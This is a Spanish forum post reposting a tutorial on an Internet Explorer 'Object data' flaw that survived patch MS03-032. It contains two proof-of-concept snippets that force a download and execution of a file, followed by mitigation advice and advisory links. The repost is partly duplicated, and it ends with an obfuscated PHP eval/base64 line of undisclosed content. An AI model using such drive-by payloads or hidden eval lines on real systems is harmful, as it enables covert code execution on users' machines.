Mocosoft y sus bugs..
Nivel 5 (1004 posts)
1 
| #0 |  |
yosolito | 15 dic 03 |
Ya se ke tal vez esto ha sido hace tiempo, pero me parece curioso..... XD
[][][][][][][][][][][][][][]
Demostración del fallo \"Object data\" del Internet Explorer MS03-032
Debido a que la gente de Microsoft una vez mas ha cometido un grave error, el parche MS03-032 que en un principio fue publicado para solventar este problema, ha resultado ser totalmente inútil, puesto que con pequeñas variantes, el fallo sigue existiendo.
En las siguientes demostraciones se ejecutará y descargará en \"c:\\\" un archivo llamado \"fuego.exe\", que es totalmente inofensivo, para cerrarlo sólo tienes que pulsar \"Esc\"
La explicación completa sobre cómo reproducir el fallo será publicada cuando exista una solución definitiva al problema.
Ejemplo 1: Sólo funcionará si tenemos la \"Secuencia de comandos ActiveX\" activada.
Este ejemplo se basa en el código original, que publico el grupo Eyee.
El código es este:
Ejemplo 2: Funcionará aunque desactivemos la \"Secuencia de comandos ActiveX\".
Esta modificación se basa en un script de GreyMagic de febrero del 2002 en el cual se demuestra la forma de ejecutar comandos sin utilizar Active Scripting o ActiveX.
Ésta es la dirección de aquel anuncio: http://greymagic.com/adv/gm001-ie/
El código quedaría así:
Para evitar el ataque del primer ejemplo debemos desactivar la \"Secuencia de comandos ActiveX\", esto se hace en :
Internet Explorer>>Herramientas>>Opciones de Internet,>>Seguridad>> Nivel personalizado>>Secuencias de comandos ActiveX>>Descativar
Aunque personalmente no creo que desactivar los ActiveX sea una solución puesto que sin los activeX no podremos acceder a muchas de las webs, y como veomos con el segundo ejemplo, no sirve de nada desactivarlos.
Para evitar el ataque del segundo ejemplo, debemos desactivar los controles ActiveX , esto se hace en :
Internet Explorer>>Herramientas>>Opciones de Internet>>Seguridad>> Nivel personalizado>>Controles y complementos de ActiveX>>Ejecutar controles y complementos de ActiveX>>Desactivar.
Si la solución anterior no era buena, ésta es peor, tampoco te la recomiendo.
A falta del parche definitivo de Microsoft, lo mas conveniente es tener instalado un buen antivirus y un buen firewall. Muchos antivirus detectarán el script que trata de descargar el ejecutable en tu máquina. En caso de que se descargue un virus, lo detectarán cuando se trate de ejecutar, y si se trata de un programa tipo troyano, podemos pararlo con el firewall.
Por supuesto mucho mejor que todo esto es utilizar otro navegador, cualquiera menos el Internet Explorer :)
Links
Aviso original: http://www.eeye.com/html/Research/Advisories/AD20030820.html
Parche fallido de Microsoft (MS03-032): http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-032.asp
Información y ejemplos en español (Hispasec): http://www.hispasec.com/unaaldia/1778
Texto publicado en:
http://cyruxnet.com.ar
ATENCIÓN !!
Puedes copiar y distribuir este texto siempre y cuando no lo modifiques y menciones la fuente.
Este texto está hecho con intención didáctica, no nos hacemos responsables del mal uso que se haga de lo aquí explicado
[][][][][][][][][][][][][][]
Hum.....
Ke ideas mas malas se le ocurren a uno despues de ver esto......
jijijijiji
[][][][][][][][][][][][][][]
Demostración del fallo \"Object data\" del Internet Explorer MS03-032
Debido a que la gente de Microsoft una vez mas ha cometido un grave error, el parche MS03-032 que en un principio fue publicado para solventar este problema, ha resultado ser totalmente inútil, puesto que con pequeñas variantes, el fallo sigue existiendo.
En las siguientes demostraciones se ejecutará y descargará en \"c:\\\" un archivo llamado \"fuego.exe\", que es totalmente inofensivo, para cerrarlo sólo tienes que pulsar \"Esc\"
La explicación completa sobre cómo reproducir el fallo será publicada cuando exista una solución definitiva al problema.
Ejemplo 1: Sólo funcionará si tenemos la \"Secuencia de comandos ActiveX\" activada.
Este ejemplo se basa en el código original, que publico el grupo Eyee.
El código es este:
<script>
 var oPopup = window.createPopup();
 function showPopup() {
 oPopup.document.body.innerHTML = \"<object data=fuego.php>\";
 oPopup.show(0,0,1,1,document.body);
}
 showPopup()
</script>
 var oPopup = window.createPopup();
 function showPopup() {
 oPopup.document.body.innerHTML = \"<object data=fuego.php>\";
 oPopup.show(0,0,1,1,document.body);
}
 showPopup()
</script>
Ejemplo 2: Funcionará aunque desactivemos la \"Secuencia de comandos ActiveX\".
Esta modificación se basa en un script de GreyMagic de febrero del 2002 en el cual se demuestra la forma de ejecutar comandos sin utilizar Active Scripting o ActiveX.
Ésta es la dirección de aquel anuncio: http://greymagic.com/adv/gm001-ie/
El código quedaría así:
<span datasrc=\"#oExec\" datafld=\"exploit\" dataformatas=\"html\"></span>
<xml id=\"oExec\">
<security>
<exploit>
<![CDATA[
<object id=\"oFile\" data=\"fuego.php\"></object>
]]>
</exploit>
</security>
</xml>
<xml id=\"oExec\">
<security>
<exploit>
<![CDATA[
<object id=\"oFile\" data=\"fuego.php\"></object>
]]>
</exploit>
</security>
</xml>
Para evitar el ataque del primer ejemplo debemos desactivar la \"Secuencia de comandos ActiveX\", esto se hace en :
Internet Explorer>>Herramientas>>Opciones de Internet,>>Seguridad>> Nivel personalizado>>Secuencias de comandos ActiveX>>Descativar
Aunque personalmente no creo que desactivar los ActiveX sea una solución puesto que sin los activeX no podremos acceder a muchas de las webs, y como veomos con el segundo ejemplo, no sirve de nada desactivarlos.
Para evitar el ataque del segundo ejemplo, debemos desactivar los controles ActiveX , esto se hace en :
Internet Explorer>>Herramientas>>Opciones de Internet>>Seguridad>> Nivel personalizado>>Controles y complementos de ActiveX>>Ejecutar controles y complementos de ActiveX>>Desactivar.
Si la solución anterior no era buena, ésta es peor, tampoco te la recomiendo.
A falta del parche definitivo de Microsoft, lo mas conveniente es tener instalado un buen antivirus y un buen firewall. Muchos antivirus detectarán el script que trata de descargar el ejecutable en tu máquina. En caso de que se descargue un virus, lo detectarán cuando se trate de ejecutar, y si se trata de un programa tipo troyano, podemos pararlo con el firewall.
Por supuesto mucho mejor que todo esto es utilizar otro navegador, cualquiera menos el Internet Explorer :)
Links
Aviso original: http://www.eeye.com/html/Research/Advisories/AD20030820.html
Parche fallido de Microsoft (MS03-032): http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-032.asp
Información y ejemplos en español (Hispasec): http://www.hispasec.com/unaaldia/1778
Texto publicado en:
http://cyruxnet.com.ar
ATENCIÓN !!
Puedes copiar y distribuir este texto siempre y cuando no lo modifiques y menciones la fuente.
Este texto está hecho con intención didáctica, no nos hacemos responsables del mal uso que se haga de lo aquí explicado
[][][][][][][][][][][][][][]
Hum.....
Ke ideas mas malas se le ocurren a uno despues de ver esto......
jijijijiji
eval(gzinflate(base64_decode('s7fjSk3OyFdQt0myc3eMtNFPslNIzVEoLE1VyMlXyElN1FO35rKxBwA=')));
